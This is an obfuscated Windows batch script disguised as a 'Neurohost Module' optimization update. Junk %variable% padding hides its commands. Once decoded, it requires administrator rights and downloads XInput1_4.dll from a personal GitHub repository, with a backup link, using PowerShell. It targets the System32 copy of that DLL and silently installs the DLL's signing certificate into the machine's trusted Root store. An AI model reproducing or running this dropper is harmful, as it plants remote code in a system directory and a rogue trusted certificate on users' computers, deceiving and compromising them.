e%cygmpVNQq%c%tpAOdsKr%h%KXSoRtRbCk%o%PAstjKis% %bUuFRIkI%1%tfZ%.%yka% %zw%A%PnJ%p%o%p%lDS%l%EuLvD%y%dvvEtzDoq% %MfBGyChwSM%O%laU%p%Iwq%t%rcqFRNbz%i%EOKrK%m%uCfKdn%i%VpKSn%z%Nrrn%a%s%t%UgXo%i%rtiZuPzqH%o%DadF%n%BjBTkKYFf% %rjLpF%(%SVKOtukK%C%HJqn%r%aNsfEK%i%xCCjSzhu%t%Not%i%NmM%c%hmLuR%a%yAxeKFn%l%WHxqomfeP% %wei%U%uhwFkPes%p%CquiaJM%d%LA%a%w%t%IILr%e%kwueX%)%EQUDFRd%
e%HY%c%ZqSctZ%h%vMuTcH%o%cWDq% %kKmWC%2%QVdcvVj%.%LsdOEBrFJ% %PgMiHlsmO%A%xk%p%qjH%p%pKtvAJ%l%y%y%rpiF% %Do%O%ZlS%r%Yhha%i%Okw%g%QWBcZZbgq%i%e%n%Sg%a%drQyeVlx%l%pDECDrlpD% %U%(%S%B%mB%a%tEP%c%VoBNZdE%k%zQxZ%u%kbAgTrizt%p%NTWGycSzo%)%Mlzm% %Z%R%avEFRhq%e%CKMojPT%p%lTiiFHYzW%l%PTHv%a%RXCIEfP%c%Xehl%e%pQZGzv%
e%NZuUn%c%gsPW%h%FYMORopByq%o%PIRUKsLlV% %MtDxRiuZKX%3%snQWkrdPp%.%SUrPSGKI% %cHbFnxfp%E%oeDjDyv%x%MCt%i%NwhrOTrSbo%t%pmbLgipm%
e%vq%c%YhmJO%h%DAVBUaNQ%o%QLCpi% %ToZldPO%=%orXKuSGJC%=%pWBrk%=%rdWuB%=%ej%=%deK%=%vhKk%=%ZleyPxAYqb%=%HeZRLg%=%ueF%=%DpEDIRip%=%jbRP%=%fJ%=%H%=%dlZqmmMG%=%tLllxL%=%HzjTJ%=%azuh%=%VxDlTRic%=%oILhXOh%=%X%=%dhLdMsoBvb%=%eB%=%UxoQhEQJ%=%HwbwioTrpS%=%CIl%=%yahDdfcY%=%Zdl%=%HIYQFot%=%I%=%jsNRg%=%lmYXfueee%=%vFlakV%
set /p choice="Select an option (1-3): "
s%hSmXlJZeS%e%DvyfEc%t%jnQELhEp% %kVPP%/%aEdgGxT%p%NaSYu% %CwKKlhgX%c%AdyRNjDVaf%h%v%o%DFvPcWY%i%Y%c%PhxUiCrM%e%vS%=%tLc%"%i%S%XliipXdLDi%e%ndx%l%IBzo%e%rpNPHJ%c%aQuUt%t%QNiUw% %iQKnzjFfO%a%MHDSLxenA%n%vSxpxZJkOw% %n%o%YP%p%mPznfmkS%t%CGPjWPw%i%WGVGZBXau%o%gqyvUM%n%NZqcunjA% %TQ%(%AufA%1%cWtyC%-%XNEVOD%3%dmredesN%)%NHzNGNtX%:%eewhU% %AZPOlNwve%"%naDgcia%

i%az%f%kqV% %vUD%"%CYRb%%choice%"%XbTLCj%=%Zv%=%lIdRpul%"%VXcaWHAlp%1%hCIwpAxe%"%dsifY% %xKLfXuOcEI%g%YJxAOOdK%o%fyF%t%TxXa%o%DJqYFkktN% %hZTFrarTuI%r%F%e%LMHkdu%p%IjTtU%l%WquO%a%Lmlechc%c%x%e%yEqjUCFq%
i%WBJJXefL%f%wrgW% %EphIMjyf%"%q%%choice%"%RKTONBd%=%wL%=%cVlp%"%OZBGKkW%2%eMrccC%"%y% %nY%g%UsRNNvEk%o%JYGpvwJqww%t%qd%o%ovPYvprOGc% %Qh%r%ONlJHk%e%qxred%p%qcKjgKAR%l%cDXg%a%zW%c%Zk%e%f%_%cHKHQ%b%BBtC%a%CajKmm%c%DyxZ%k%UwRYiqvVO%u%zwzTAi%p%KMnXxmr%
i%etCuoKOX%f%MzgniwKAD% %oqdUZu%"%WZ%%choice%"%PFzb%=%rCHTYMXr%=%QEZRkFqq%"%kQCuss%3%pJyXhwyJ%"%oDlZcfxuiB% %PSgGoyeqX%e%lzedDnDbuK%x%xhqYFLG%i%tx%t%tTqyPwENfQ%

g%gTvBFAXR%o%Bf%t%aPdBnHFG%o%tg% %UIwoceFK%m%GsjtQyB%e%poKnQGQXW%n%LJrsNibDS%u%GGEZ%

:replace
:%IwmUsTCSOM%r%ZcfiA%e%fIb%p%NVB%l%DaJffawX%a%rQWXFeDI%c%S%e%jmSI%
set "dll_url=https://github.com/dadajjjjakd11/Neuro/raw/refs/heads/main/XInput1_4.dll"
s%LCLzvSKP%e%ilQfCM%t%CYijA% %nqGyJl%"%QwaI%d%hRinmWIWdO%l%WKZmmMfyEt%l%HEvRyyM%_%DkmEV%u%eG%r%NsjHV%l%rDlkV%=%qpULb%h%olk%t%wcF%t%OFb%p%WTSdJj%s%PzAO%:%GzQlv%/%LfUjOGKZ%/%DkSEzic%g%GsgeQlu%i%eCFPWpQ%t%gFRgKr%h%muSLSr%u%FLFlbKke%b%uJdXXP%.%kwymamtf%c%rQZm%o%nrCPCRIlOT%m%Jpnhx%/%dY%d%YRPNCLkVXU%a%ZHvURZUGN%d%zPxMverp%a%UEPYBesbr%j%Prk%j%jdqUz%j%p%j%wPQ%a%jaZ%k%uoxAwqK%d%qwn%1%PuirTz%1%Rl%/%mEyuKCJ%N%gqPAZKXxK%e%tOo%u%T%r%gBMgbSJQoq%o%si%/%qdizFfGYry%r%vWegPT%a%kUig%w%cQYON%/%fefM%r%BFaniTXjB%e%A%f%ooEhZmFWN%s%CTW%/%DK%h%VL%e%IXwWP%a%LX%d%iEKh%s%zNEBhFgY%/%KjX%m%LvlCGfGfIf%a%nPTcZ%i%XmhzUuK%n%vHcPmhkAlp%/%PpJzKnYD%X%eQFrwJp%I%nCwkbIxdA%n%ryffgkEd%p%MLHSv%u%fTU%t%AXwri%1%NRplvf%_%DVmtC%4%mzCi%.%nVNGPNofnB%d%SIL%l%xizxmXRgs%l%cEykg%"%mjfMVOjhnZ%
g%xuFXQaVB%o%TqMNn%t%zRcmwuIXpG%o%RXadN% %iCBumv%d%uPcDj%o%Ha%_%nUcPvlKIE%r%hfELD%e%h%p%LisjwSTR%l%ZlI%a%X%c%v%e%Bmfx%

:replace_backup
:%TctfkfPFr%r%vKgszuv%e%QgxMV%p%orcHUdlEdC%l%gFjnFzFSG%a%gxfyWi%c%BOwnyrLuh%e%SLhDnWo%_%SlGKq%b%q%a%c%c%fVv%k%l%u%YErx%p%FDfEjSrY%
set "dll_url=https://github.com/dadajjjjakd11/backup/raw/refs/heads/main/XInput1_4.dll"
s%jESuBmMO%e%u%t%bMtbsnW% %K%"%zdCgUDCM%d%fVuKLqC%l%jrL%l%RchEbp%_%g%u%m%r%hXrUWUFUkD%l%DzsCvCduy%=%cRsbzR%h%DxvreUR%t%utV%t%lADDK%p%QEl%s%gpxCzApL%:%tpUblwd%/%ebmUXoQKM%/%qywMIQRzm%g%FgFkgaDcq%i%tDUPu%t%LvgZLlDCsa%h%ZV%u%bLjeW%b%yJ%.%MWy%c%cDHpYSci%o%mjrhNMnUY%m%VLLFOcPDy%/%ZovaTl%d%y%a%rVaPO%d%WOhmYvuW%a%cwdstDYfto%j%Wz%j%cR%j%MpXD%j%XJjHG%a%FQyKGw%k%TD%d%zLJImBy%1%oZ%1%TdaSMwiXx%/%Gw%b%WTUVN%a%SXaGv%c%jbAbyC%k%tgbbkW%u%HsogBTI%p%WaGlCUJwa%/%Ym%r%XyzFhdysI%a%u%w%KZjQv%/%KMNDIc%r%UlUPEO%e%qUEzn%f%JQI%s%sFgtibBvD%/%Cpn%h%YsT%e%VkONCUZS%a%QqCWeL%d%pFXSI%s%Cmd%/%f%m%MMGccm%a%lENeeQNl%i%TFreSLVEMO%n%BlX%/%E%X%Ucsjrk%I%KXMS%n%Jm%p%itXfYRSZKh%u%VSmBRo%t%bwEGUHODQY%1%BmGBx%_%E%4%CtjzfjNS%.%kqS%d%Wbkxnnz%l%yPzgOuAPq%l%ZuTQwhboyh%"%bSqD%
g%xiOrRJv%o%TdWunhEGT%t%ZFjUzi%o%VDULGKE% %oaWlSRD%d%GBXPEu%o%WNhaW%_%L%r%uqtMoV%e%aAQFVQLZCm%p%Quq%l%zESMGnaVSm%a%jnqVDqHay%c%OYbZQJCLCA%e%oAsNYsO%

:do_replace
:%WjSKIbCUWg%d%erbdLTe%o%dFf%_%fImfb%r%kq%e%ZpR%p%alltsoIpn%l%gC%a%ohW%c%wleCfV%e%RFchmjNGi%
c%XU%l%q%s%OYiEtrCdC%
echo Neurohost Module: Applying update...
e%hbepOVKnSm%c%tyQ%h%uSLT%o%BvE% %ZwQxnLma%N%tz%e%BAc%u%Likjdr%r%PCakg%o%WwJyvKXgwh%h%BQdLn%o%WMqTb%s%KSNl%t%vtBOYHDu% %YS%M%gzqD%o%pBuCV%d%oTEYZDxtBX%u%xEvlpz%l%JxraAsEi%e%kUEEaqH%:%aXTvJBbP% %TmESIhb%A%svaLPI%p%vhxHuL%p%od%l%USArXugZxw%y%dmPlCZ%i%s%n%Y%g%XEEucqn% %SVazP%u%MmxWu%p%RXSbWA%d%Zv%a%ylDGkFn%t%OTpOfStjY%e%VKFwgV%.%OzssBLwYf%.%xveKvOUASN%.%KSOvghWQkd%
e%qEym%c%bVERsnq%h%z%o%UeQOBQiZl% %z%=%cIJQUCEdV%=%vL%=%w%=%mdKWqpmb%=%oXkGcdV%=%OAwCyAJyJ%=%F%=%uFWVl%=%DZOM%=%NnGlrARYY%=%zUefo%=%vF%=%VEdZ%=%Y%=%rxHmShAxoZ%=%vIvI%=%isxiXKfXdM%=%vqZo%=%GhCcl%=%dq%=%TxFwsLflz%=%e%=%Uim%=%TpXUzYBob%=%HYOjxWNqai%=%ItpgvyWlgv%=%KHRNIMIk%=%X%=%qxUqhD%=%OWHVbWlY%=%z%=%oyoyVVzn%
echo WARNING: This action will apply system-level optimizations.
e%GsfNHE%c%ulW%h%wtnhw%o%mxiYozrqrw% %CeOnnDa%W%sxhIuYUy%A%DIfwcY%R%wY%N%zeTHe%I%ouDJVspFS%N%xBxVAngJ%G%uy%:%wiNK% %voX%T%taEwc%h%QRdmHl%i%RkgZwpUnc%s%zQhdEKgK% %AnzDPVXE%a%YkYwnCdg%c%u%t%CSvIV%i%iqgzuoTo%o%nItwW%n%avhFLiBli% %ElJ%w%wjzarUFb%i%fuQSO%l%yOoAX%l%mOoJQTQ% %DlCO%a%vpzbmeA%p%ar%p%Jiwz%l%pAH%y%wwt% %gHdrV%s%Omhbz%y%LpBUeEOxP%s%GpyywCBqn%t%tFg%e%RMYuWzedYr%m%vPPDac%-%ZIvdSEzvt%l%PECBkvZbyO%e%OWl%v%D%e%zve%l%Say% %ecv%o%RUVeBLDra%p%FBkJQjXyR%t%igDlcyY%i%FWirFYz%m%SNZmZbjWdO%i%OlOl%z%iLOMHJ%a%rYYLViuG%t%Kwy%i%fTOtnss%o%j%n%KNXhK%s%TjliVCjLg%.%tVtIgG%
e%tZU%c%ACVB%h%NXv%o%ffA% %uHBQpXXTuW%P%sMoHTkUF%l%ejua%e%KHDAeBYUp%a%aJe%s%VfqQbkLX%e%L% %PAeJxWy%e%nmlwAouXQ%n%aeWYRsg%s%z%u%LrmZiLPS%r%SqVemylg%e%QiBh% %roYGgxGRiN%a%Ij%l%KfSQ%l%Rc% %T%p%tdzK%r%nEFHSpeunm%o%xDnGXQP%c%MSwQc%e%qERiHHhKpe%s%mBYAihckur%s%lYDF%e%EBDAX%s%SFsokRE% %BZrj%a%TuDGCMABNx%r%ZYjm%e%at% %hWVJkIkvit%c%k%l%MJk%o%GUlkexxG%s%zRwV%e%cjRHFOSVD%d%RyrGIQqMgX% %NVLGqwfWRB%a%uoncPZB%n%bPEjDhl%d%GvEixzqQWL% %aqDMK%p%zz%r%dveha%o%IzV%c%QaZ%e%LYMW%e%iWnsIIYYow%d%F% %jGMTi%o%zkgRlo%n%Hw%l%YXHg%y%Lgg% %zCMN%i%hPnG%f%JJokEkSN% %uvOECXWDn%y%DZIjNQxmg%o%q%u%qjxoc% %xbFdWgDp%a%jxdPrh%r%wfTdLfU%e%PiXV% %cEANczekFM%r%vw%e%Gq%a%VenYms%d%jNCcv%y%xsxbSq%.%umEz%
e%vfEMGI%c%tvAySkntIU%h%J%o%BPoefA% %xZeOR%=%vFHZBbrfU%=%krEXoFx%=%yqbLQurBp%=%t%=%vsVvftn%=%iDewLOn%=%nledTv%=%XB%=%ClBvJIBHaD%=%IRwO%=%g%=%EXUa%=%RTPla%=%QKYael%=%kpRWJSuGk%=%ALOgcbuxKz%=%AyfLs%=%UDfhanbG%=%FMcjnI%=%VnM%=%gGeL%=%NFUOqVvK%=%d%=%H%=%JMN%=%Wo%=%jDo%=%aB%=%YiZCFsjNQ%=%mnGklkVuPc%=%UNiN%=%MYBmas%

:: Check for Admin Privileges
:%ZTVlKakQf%:%WStTWzbb% %DaScd%C%EuqMsStTPM%h%ZbtN%e%DhvFkK%c%bYUrhE%k%d% %s%f%OHJPLUm%o%bLjt%r%hz% %ihVJJ%A%z%d%MDsyNKHYcG%m%yUT%i%NlZpxefzb%n%U% %iHo%P%kZ%r%HecXz%i%gnPNyviP%v%zNsNMpvAch%i%LeYMJ%l%TMOcEJnMzH%e%cZMJEpjdR%g%WtlHZlgfOt%e%cIrSkIrG%s%u%
n%shB%e%Ces%t%vxwn% %Bb%s%sOJjvb%e%HMrg%s%sC%s%xZPrfcaFAU%i%cZ%o%TQAJPpRD%n%cRa% %BoYISxzyb%>%mPLBRtbjCM%n%BWa%u%oHTQN%l%mSyWw% %vGSZwFjSB%2%PQOIH%>%HBbNPOU%&%AwILvbU%1%rmknKDjU%
i%UIXBJcwL%f%VSyzrBDDr% %baDMOpvnCj%%errorlevel% %xN%n%TXKGjVpv%e%YzwWb%q%WCbSleYy% %BbGBtVcd%0%xTUdWEE% %jebxnYm%(%DQVYEfNx%
    echo ERROR: Administrator privileges required.
 %m% %srf% %HfQHtNeNUZ% %uCORCOpAfs%e%ZI%c%oWhkrri%h%AjWkOyYpgP%o%jXAWsgMkJ% %pjHCQMfaAC%E%jsF%R%QuKwIh%R%u%O%PUoGslla%R%EyJLkwpi%:%kbbMVKim% %Axg%A%rpUalM%d%zqzuN%m%YFWGRyEo%i%ffiyG%n%cbnyepKwB%i%zeqBYGRq%s%UfWX%t%TVWccNbsOq%r%uA%a%hVQBz%t%VZqPHNXA%o%dHbs%r%K% %XjrCbtAOKA%p%DfLYIbvP%r%Rb%i%Ytm%v%Crhk%i%WJKQjQw%l%IuqOwuvhtm%e%kym%g%UCsWponvwg%e%eOtSkDsung%s%U% %QyaMzRfL%r%UN%e%uIbk%q%qCrXwYwlnY%u%tXfqzs%i%kMfX%r%rwDhBOWf%e%Tb%d%lGyXx%.%vPhLXsuwVQ%
 %r% %mh% %KBqpTGk% %gIiWLVfamc%e%EIQPPNrwy%c%xtaABUe%h%cnaKfvSQVJ%o%Gb% %x%P%iBuxkxESv%l%IsL%e%IZAXi%a%oMksXDn%s%uihKY%e%KqQtXrNL% %gdV%r%rUVPkKofTZ%u%Gg%n%OgXZr% %YejpFBWyp%t%NrspO%h%thUEmwQQ%i%oMXEWyeY%s%tRRMtNBN% %WMmqqqVfPc%s%tr%c%ySJDWUnj%r%Nsyj%i%AKiz%p%Dfhd%t%m% %SrV%a%dq%s%rYs% %AKbzuDtc%A%XtNPIBBzm%d%hrsVzWP%m%XLcU%i%Xc%n%nYpz%i%Lf%s%yFoWg%t%LgpDHm%r%n%a%qgpdmUFEAf%t%es%o%ogfZ%r%Nq%.%FaJb%
 %gyrf% %fcLtwmPzeu% %DXKv% %AeJq%p%jbdoXfSlO%a%SFGROYdXHL%u%QDZf%s%FfHnCFB%e%JCqDe%
 %hoqu% %ZLSBdklWB% %xCoaHl% %VTXVDrFcvC%e%BRh%x%JFRzJSTQF%i%ssCk%t%bBCfCdEOG% %FBvHHrKF%/%XpDuk%b%U%
)%SgFASn%

:: dll_url already set by replace or replace_backup
:%ZMltqeNe%:%rik% %Z%d%VTFdkyT%l%JcP%l%lpBUfdWGZP%_%p%u%pJRHWatu%r%eLGI%l%lMMuQINXVl% %prMVkAvQP%a%mzSae%l%AKNpjP%r%XtdieHT%e%VWZnCeeNv%a%NYACrpk%d%aJe%y%ofhImZ% %fCkZv%s%wHLNVguOa%e%ZBwEsWHxM%t%cJwa% %vjtNqtCm%b%zg%y%Dcq% %ojmCAsfSUZ%r%IjOGKws%e%XvWK%p%xTPuKnn%l%XegcvBOOg%a%hakbEHUeo%c%D%e%Y% %HqmpIvadJd%o%QFi%r%umQfnvNYVc% %PhCCzTcSOx%r%pcxMCkMDLt%e%kFyQ%p%sC%l%UXGOcJ%a%XNIgFCKY%c%awofj%e%zUJOZS%_%X%b%haJvajtnC%a%QHkCaEANY%c%p%k%sPqykML%u%jHLZIew%p%YTXsxhz%
s%JOnGeCr%e%x%t%c% %mouhVfrZw%"%fHiU%d%GTJH%l%RZqHr%l%poWv%_%lhdJ%p%AZY%a%KQT%t%fcnNoJYeEZ%h%HtChoaYNf%=%uj%%TEMP%\%VDt%X%iDNvQZ%I%gzFuw%n%bffQDrj%p%ZrEuO%u%rc%t%YTrklhxi%1%CtpMDaJ%_%kFg%4%EpW%.%GVrA%d%vTiKAYHOe%l%laZCnYru%l%Ygh%"%UUUcKNMjU%
s%Ok%e%wB%t%zTmM% %HA%"%EGrb%s%J%y%F%s%hVGVneZ%t%tcdwf%e%DlN%m%bVwD%_%UVbJvYH%d%HLVH%l%XQd%l%bFpV%_%mQomyfDAB%p%RSF%a%uBlOwBoId%t%LaS%h%fd%=%fiITDvN%%SystemRoot%\%pUhemcG%S%NJqzDiscPK%y%YSSmM%s%dwzs%t%YtDvtymg%e%fSgRKwbYOH%m%Oewj%3%ptPGOo%2%NCtLUkaxy%\%DgvmUxXXy%X%DIsbHVrtd%I%GzlKYl%n%Al%p%xMhMpUKA%u%UvfaNA%t%iFYbbQR%1%b%_%lKjUKzpA%4%kmK%.%JbGpu%d%YVuYNWmMdO%l%Esaemgq%l%eqApX%"%fBwDyHob%
s%YoTGlwpxqB%e%Pc%t%JDnuWFm% %DztoHrXaA%"%D%c%B%e%mKytvcNW%r%IzwFvT%t%YiVc%_%LaiSDSxRsR%p%KCDRCb%a%vdwSpj%t%FyRUFS%h%U%=%mVBJ%%TEMP%\%lvmgcQ%t%MhLh%e%VNbyktC%m%SeiehxrIcN%p%cMbXXTL%_%uhGdQYJul%c%LVBMBYhz%e%MX%r%RWuQNE%t%zwgsyOzjAT%.%spwdmK%c%oamgD%e%o%r%pbKsX%"%qmnu%

:: Download the file using PowerShell
:%WzCfiLxsI%:%eeoiiUz% %CprFQcQJG%D%bFeOuxXPeZ%o%njaSPos%w%ZiiowsLBnt%n%MnOsfqCe%l%ZXrnmCobPJ%o%yHrXdpOcwP%a%fpxA%d%SNLHHyL% %wpCWbETKY%t%SaBGnZQnh%h%VvCJj%e%Eki% %u%f%XR%i%MWnYQGkJMT%l%ppCavNxm%e%cWa% %bDsRybMt%u%cAJtSzxtt%s%VmRxnE%i%C%n%j%g%A% %sngOEhExlp%P%kotlJSbjbG%o%O%w%RdX%e%dDS%r%m%S%FWYpqMe%h%jbMiV%e%mabnp%l%NkDoRZtxhV%l%CPnPK%
e%xVaElLEU%c%YxGkqeCs%h%s%o%dxeMo% %rlubIXtw%C%lAhimxTX%o%PUmJo%n%WgvbmrBdoZ%n%CwHhlF%e%wwPsiBbqyt%c%vEpEEKb%t%RHcP%i%VmGlE%n%NBfA%g%lFsPcXQD% %XfsiOkWwT%t%vrhV%o%flWWHfA% %gOezmLx%t%WV%h%TnI%e%xUjRBQ% %y%s%lCxNdZvY%e%z%r%cejDQoWHdV%v%XeVpZFWd%e%rFuTL%r%VmLkELXeb% %qSJPMCsCq%f%ukioWR%o%FI%r%P% %PXFGvVliF%H%mFEuJv%D%iV%N%cd% %gDjGKz%u%sgYVRE%p%fnBqrXvl%d%NrtCy%a%hUhwodyf%t%sZWGHatCay%e%zCpr%.%aJaSoiET%.%jPrYenuxLQ%.%fsPt%
p%fOPDOWCTKi%o%JSRkvqM%w%ilEuUGHj%e%OWXr%r%x%s%SWYJ%h%XM%e%VcysR%l%QmteNY%l%JzbxoZeg% %VoNsyd%-%qxAfe%C%YGAfCM%o%sEaLE%m%gDAwiQChk%m%vSSK%a%ChMPHjbow%n%nysTbRX%d%aUxa% %NHUK%"%DkkFV%&%wKjg% %shagmPiaLS%{%V%I%SXZuhLcyv%n%Yl%v%WZ%o%xBOQ%k%ayOlDzyoQ%e%KtLkh%-%QfWjwWqIB%W%Re%e%SmQfN%b%Kno%R%OJPfzUkc%e%ypTDrFC%q%KYiGKJ%u%UrDnYRL%e%TLchZz%s%cGdouAbheC%t%YfrooD% %wRBGgKs%'%RjpO%%dll_url%'%V% %ogyTuJSHG%-%nXzg%O%Ul%u%VdcXtxHhZw%t%p%F%KHudMpXy%i%vLZgBbNYG%l%MF%e%dyEyN% %wlYjhlfBEl%'%kLfJ%%dll_path%'%Pp%}%lh%"%PDnbAcHU%

:: Check if the download was successful
:%JW%:%rkLuoQrEil% %eYJC%C%pZnP%h%MxcSPrGMX%e%hZWXIPCJtS%c%RuJYTrMty%k%Tiw% %wdA%i%wtNCDTXAb%f%IEVBdG% %uwA%t%aquBhlIn%h%KDxzJZIN%e%aXHRpUr% %DHdhQeMgrT%d%FKRgk%o%rD%w%o%n%Dloy%l%LZmCNrmj%o%goxAEk%a%Ap%d%y% %YcIERHKD%w%XMQQvUZpp%a%RiArXcHYq%s%LhW% %rfuTWLjaG%s%R%u%SdTr%c%vYXjs%c%eJbAxF%e%aXGTrL%s%Ccskz%s%NlpY%f%KDFif%u%riGaJxgCfY%l%okHXZQz%
i%nHkOhtYvi%f%JESFYATlrc% %lDJwSiu%n%LciP%o%etTHDhc%t%g% %YmJrTn%e%jc%x%QBDmiauelV%i%IOphYoV%s%EwelW%t%uqB% %yZZH%"%TUknGv%%dll_path%"%W% %IsmjEu%(%oNYB%
    echo ERROR: Download failed! Please check your internet connection or the link.
 %KyWs% %lLJbf% %JSQ% %zhvEyfd%e%eEmTRZpiz%c%hQJxKQ%h%OCrGZ%o%ibRBpfh% %CSUq%E%JPaii%R%IKbQAFs%R%i%O%yVC%R%vz%:%gtoAclBtW% %sD%D%qKWKVRYddp%o%TkvBia%w%hTIoXZSnB%n%Foyldiiy%l%FJDfZmSBf%o%jtvqqYAted%a%vtGHR%d%DU% %yTmvgzOcFo%f%Qd%a%gHemSjTD%i%wndNpq%l%DQdF%e%MX%d%VOuadhi%!%XBv% %rKy%P%Difjit%l%uY%e%j%a%AjhW%s%zOPZkuUMwJ%e%OACtdzOTvc% %JxLyuRTJD%c%rsmj%h%VnAKItLuWs%e%S%c%FmGdvSQDY%k%HobONeVJXw% %bXTLgYf%y%LxWReF%o%SAb%u%CUoUsUwjB%r%g% %hzdhuzD%i%IhZlT%n%k%t%SZW%e%TWp%r%hAPmNCThYD%n%mIp%e%YiOj%t%pVG% %V%c%CeurzzP%o%fjcLYW%n%u%n%INBWfzB%e%d%c%q%t%b%i%WogcgBRas%o%lcMa%n%VdvIP% %kaVUdqnA%o%Iy%r%NQUoaHc% %qiIXgyv%t%iuHFPeUVqd%h%AYvHXVVoA%e%GUvDaK% %jdX%l%HNSdLgQuCf%i%MribzlfEpl%n%Smb%k%xBMEMcWVa%.%gbhgnXHJ%
 %QMWg% %UGzzY% %bK% %ManseZMJ%p%cxSLp%a%TKuWhdcb%u%SYQy%s%BvlaciQjX%e%mXMRbwDcU%
 %Rx% %vMS% %b% %BSoFAxCO%e%rMOuFiUUyh%x%dTnLYbOrOV%i%y%t%XDD% %erM%/%KpTaZxdI%b%xgfXRTac%
)%r%
echo SUCCESS: Update file downloaded.
e%nU%c%uapGDqpYaZ%h%glwRdlBugU%o%rnVJaH% %Qk%S%ATG%U%GuxOl%C%iOwEwLhijx%C%MtLvhjS%E%U%S%nZ%S%UbN%:%ZFWbaunI% %xWpnSaSi%U%zVAiNa%p%l%d%r%a%dCQPYkmq%t%CgtBOxpQe%e%R% %cz%f%JXdOMXGL%i%TElRMZgU%l%mVHZ%e%GYO% %AXbvycImdn%d%KxwPHAlKHu%o%P%w%He%n%oKZWm%l%nkJiTNnD%o%wIC%a%jNfF%d%de%e%XmhrLxhPS%d%aIi%.%g%

:: Silent Certificate Addition with Friendly Name
:%xEhbaHNU%:%oK% %XpGkg%S%bkzkk%i%N%l%zIUrEgR%e%WQ%n%eefikInTMr%t%URzONeBSC% %d%C%ehtMWLOXFX%e%tEkJGlF%r%LUb%t%FjdZqX%i%X%f%YAqs%i%xqYFywhF%c%DXh%a%HqsRo%t%hCrS%e%IGeZy% %BCLJsaQ%A%WoWaGH%d%E%d%lfkpd%i%tvOM%t%vOLq%i%NvJ%o%PqXAbC%n%zhNFKw% %VnvYtLS%w%PloIJSpjxJ%i%BFyBK%t%QOK%h%Ezuq% %wUYZhEbAO%F%wDWpmuEF%r%APuNwwTD%i%CykMwrVl%e%UMS%n%XVwCZVgJA%d%BfSZwvZwmV%l%lprUny%y%gwjSuEFWnq% %HYCsbXhsyT%N%vQGOIY%a%Uiy%m%aZlyg%e%WCKaNRT%
p%uRDhA%o%AqVtsXdpg%w%SAZK%e%JYm%r%rmTwIPzU%s%WnXrLea%h%kqzDfI%e%i%l%wb%l%LcALhCm% %sZgmE%-%C%C%Te%o%XdnYOGu%m%p%m%yC%a%tFZjqyTHzA%n%GHU%d%ua% %t%^%Lqma%
"%DCJyNn%^%iTP%
 %efJhPhKE% %ZqDgSFF% %PORkg% %aFXEHRKbmR%$%V%c%lNNPZZa%e%BlS%r%jK%t%ukEXjjUjwW% %ASoNEVyH%=%yfNPk% %znZXWBPCpQ%G%rfoNyW%e%nhtQl%t%YkFYvqpbiI%-%Fer%A%HQE%u%mU%t%pKkArxqb%h%IlUFUHV%e%GmNhlMfg%n%dtajUvrVg%t%JLw%i%lDaw%c%hTyx%o%QqngxBY%d%EzQs%e%OknJQwHcI%S%TcP%i%YGewnwI%g%IU%n%GgZjJKDlJa%a%tPEG%t%iZ%u%vc%r%NxnGVa%e%Yr% %X%'%qLGWt%%dll_path%'%NVjMr%;%HsY% %iern%^%ABhqr%
 %nhNN% %mKGwdyz% %zk% %DgUiYU%i%lIGnf%f%jT% %iy%(%jcuK%$%UHDkBle%c%OISFTxc%e%DvhUUaK%r%AaiZZbVt%t%pFoXaxLOBd%.%hHKsztgKRJ%S%mGMkEmW%i%a%g%GddPiOX%n%kbJbMbrJKl%e%qWmWJFz%r%yeHsCyj%C%ZnLMZ%e%TBzaCWmEj%r%MIgUmT%t%EwBIlAi%i%TeyOPXDDfn%f%yEHqy%i%wvgkZ%c%mBkyaKVEkv%a%WZvdrTureg%t%sj%e%LnU%)%teQya% %Tj%{%TMUcKndr% %sEouUmf%^%tX%
 %EIBrPPE% %oTAPc% %ef% %xebQf% %QkcRcM% %D% %yBcT% %QdtKQ%$%bYyVz%s%V%t%h%o%YQ%r%lYkjDqe%e%iOakmpcSRY% %OyWit%=%Tm% %WL%N%voa%e%AbzY%w%LOsCj%-%SqBcPOK%O%zm%b%F%j%hIIjlzWv%e%gbXqkxv%c%mRJ%t%MLEotpul% %uYCXcGtOpA%S%DdgTxYn%y%mDjguEXzbY%s%GDtCd%t%OGEbWTS%e%RvJhYfhIn%m%Yr%.%p%S%CTjQM%e%keEPfJ%c%ItG%u%OXxJzQfWl%r%lDCYgoWV%i%wfFJIFYL%t%tXAHa%y%i%.%KGS%C%HInX%r%TsMfqDLTK%y%vDUBDAJzns%p%YMTgdYbdA%t%p%o%g%g%BaGff%r%aD%a%WiFJvREq%p%COMBW%h%geGUijcn%y%GMJKQeLL%.%sAIOksUyQ%X%eqFYoYnjuL%5%cEPYz%0%DYnnwOXjev%9%Egwjjxu%C%lLDMiUsSe%e%LBYzgI%r%qFbnWCsoXS%t%Wltc%i%YBLMLPmcqy%f%CbCiM%i%DuW%c%jPp%a%KdYNnEgzK%t%acKUwjPja%e%HKtkPkeFdO%s%LbCB%.%FlMMS%X%LGVki%5%KGoNHz%0%QMvxZwq%9%UjsydjEHy%S%cKo%t%VKPZ%o%ZZrghqI%r%nmWGVfpH%e%KQiGMV%(%nNnpDqzVlv%'%jrECtd%R%tyAaZjtdbk%o%xHzXSFhh%o%zFGqkEj%t%sP%'%nfXE%,%aEkJvZDq% %otZ%'%wmuGim%L%cz%o%gnrFcYUvd%c%byRjRLBD%a%nipfWeSvY%l%iLUDf%M%WeY%a%svOWxg%c%epTkJMYUBW%h%SCTOUUqaR%i%cLMuoMVhdP%n%yc%e%ckHEqocSr%'%TIAcuBlgDR%)%LKDvPCqnaO%;%wQRg% %JYhoHQ%^%pGuPeY%
 %rlzGLqt% %mLRSyF% %r% %V% %Kqm% %fZQ% %UjarqLChX% %ca%$%LBhIlNdTd%s%BlgqX%t%RI%o%GFuypIcfp%r%RXQDKr%e%hFhgSuH%.%XHSsX%O%oAc%p%ndUHALx%e%A%n%gRZR%(%cRAa%'%ApjW%R%EWmkXT%e%Jtot%a%OXYCQG%d%Y%W%B%r%UtdavzZYgT%i%IXPnx%t%vIUY%e%kwjIjCEq%'%JluqRE%)%TGU%;%sSexFV% %WCoPTBf%^%GrS%
